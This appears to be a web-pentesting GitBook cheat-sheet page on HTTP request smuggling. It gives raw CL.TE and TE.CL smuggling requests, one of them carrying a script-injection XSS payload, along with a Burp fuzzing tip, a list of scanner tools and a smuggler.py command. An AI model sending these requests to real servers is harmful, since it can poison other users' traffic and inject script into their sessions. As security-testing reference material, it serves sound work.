HTTP Request Smuggling

POST / HTTP/1.1
Host: victim.com
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

Z
0
GET /smuggled HTTP/1.1
Host: victim.com
X: X

Open Redirect

XSS

POST / HTTP/1.1
Host: vuln website
Cookie: {your cookies}
Transfer-Encoding: chunked
Content-Length: 100

0

GET /POST?postID=2 HTTP/1.1
User-Agent: X"><script>alert("XSS")</script>
Content-Type: applications/x-www-form-urlencoded
Content-Length: 5

X=1

Bypassing front-end controls

Stealing Users Requests

Content-Length Size

What size for Content-Length?

Fuzz: Burp Intruder -> Payload type: Number -> Range: 1 to X -> Look for response variations.

Burp Extension

HTTP Request Smuggler

GitHub - PortSwigger/http-request-smugglerGitHub

Tools

GitHub - Moopinger/smugglefuzz: A rapid HTTP downgrade smuggling scanner written in Go.GitHub

GitHub - anshumanpattnaik/http-request-smuggling: HTTP Request Smuggling Detection ToolGitHub

GitHub - defparam/smuggler: Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3GitHub

 smuggler.py -u https://target.com

Resources

HTTP Request Smuggling: Attacks and Prevention GuideDeepStrike

A Pentester’s Guide to HTTP Request Smuggling | CobaltCobalt

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousHTTP Header Exploitation NextPrice / Checkout Manipulation Methods

Last updated 7 months ago

hashtagOpen Redirect

hashtagXSS

hashtagBypassing front-end controls

hashtagStealing Users Requests

hashtagContent-Length Size

hashtagBurp Extension

hashtagTools

hashtagResources

hashtagInteresting Books

hashtagSupport this Gitbook